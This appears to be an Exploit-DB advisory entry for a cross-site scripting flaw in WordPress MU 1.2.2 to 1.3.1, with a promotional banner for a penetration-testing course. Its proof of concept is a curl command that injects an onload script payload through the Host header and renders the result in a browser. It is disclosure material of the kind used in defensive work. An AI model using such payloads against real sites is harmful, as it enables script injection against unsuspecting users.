WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting

EDB-ID:

10090

CVE:

N/A




Platform:

PHP

Date:

2009-11-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

The following proof of concept is available: 

curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html